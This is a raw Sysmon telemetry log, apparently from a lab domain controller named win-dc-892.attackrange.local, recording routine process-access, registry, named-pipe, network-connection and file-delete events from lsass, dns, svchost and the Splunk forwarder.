12:01:24.689{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000003135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:24.689{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 17141700x80000000000000003134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:24.299{266CAFBE-647D-6064-3200-00000000AE01}2716\Winsock2\CatalogChangeListener-a9c-0C:\Windows\system32\dns.exe 13241300x80000000000000003133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:24.299{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exeHKLM\System\CurrentControlSet\Services\DNS\Parameters\PreviousLocalHostnamewin-dc-892.attackrange.local 10341000x80000000000000003132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.299{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\Global Catalog Promotion CompleteDWORD (0x00000001) 354300x80000000000000003365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.811{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49717-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.811{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49717-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.810{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49716-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.810{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49716-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.744{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49715-false10.0.1.14win-dc-892.attackrange.local389ldap 
354300x80000000000000003360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.744{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49715-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.731{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49714-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.731{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49714-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.725{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49713-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.725{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49713-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.724{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49712-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.724{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49712-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.722{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59225- 354300x80000000000000003352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.718{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59548- 354300x80000000000000003351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.717{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60228- 354300x80000000000000003350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.716{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64536- 354300x80000000000000003349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62551- 354300x80000000000000003348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49711-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49711-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.714{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60475- 354300x80000000000000003345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.713{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59146- 354300x80000000000000003344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.712{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59456- 354300x80000000000000003343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.710{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61913- 354300x80000000000000003342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.707{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54366- 354300x80000000000000003341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.706{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49710-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.706{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49710-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64177- 354300x80000000000000003338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.704{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62870- 354300x80000000000000003337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49709-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49709-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55032- 354300x80000000000000003334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.701{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55187- 354300x80000000000000003333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.699{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49707-false93.184.220.29-80http 354300x80000000000000003332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.699{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60851- 354300x80000000000000003331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.699{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49708-false93.184.220.29-80http 354300x80000000000000003330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.698{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62151- 354300x80000000000000003329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.696{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56045- 354300x80000000000000003328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.694{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local49214- 354300x80000000000000003327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.694{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57717- 354300x80000000000000003326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.692{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58852- 354300x80000000000000003325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.690{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60084- 
354300x80000000000000003324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60579- 354300x80000000000000003323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.687{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58438- 354300x80000000000000003322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.685{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local54221-false127.0.0.1win-dc-892.attackrange.local53domain 354300x80000000000000003321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.685{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49706-false10.0.1.14win-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.685{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49706-false10.0.1.14win-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.684{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55101- 354300x80000000000000003318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.684{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54221- 354300x80000000000000003317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local62468-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62468- 354300x80000000000000003315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:f8e0:fca5:d9d:ffff-62468-truea00:10e:0:0:0:0:0:0win-dc-892.attackrange.local53domain 354300x80000000000000003314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54227- 354300x80000000000000003313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local54227-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54737- 354300x80000000000000003311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.682{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62177- 354300x80000000000000003310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.682{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55707- 354300x80000000000000003309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.681{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1win-dc-892.attackrange.local60002-false127.0.0.1win-dc-892.attackrange.local53domain 354300x80000000000000003308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.680{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local49570-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 23542300x80000000000000003307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=68BCDF1212B476DB3583BD35A962B691,SHA256=7BEAC708211278D0A0B6C5C8C3F194B3E379B1696BDA8D3B87FA29AD891D2AF1,IMPHASH=00000000000000000000000000000000falsetrue 
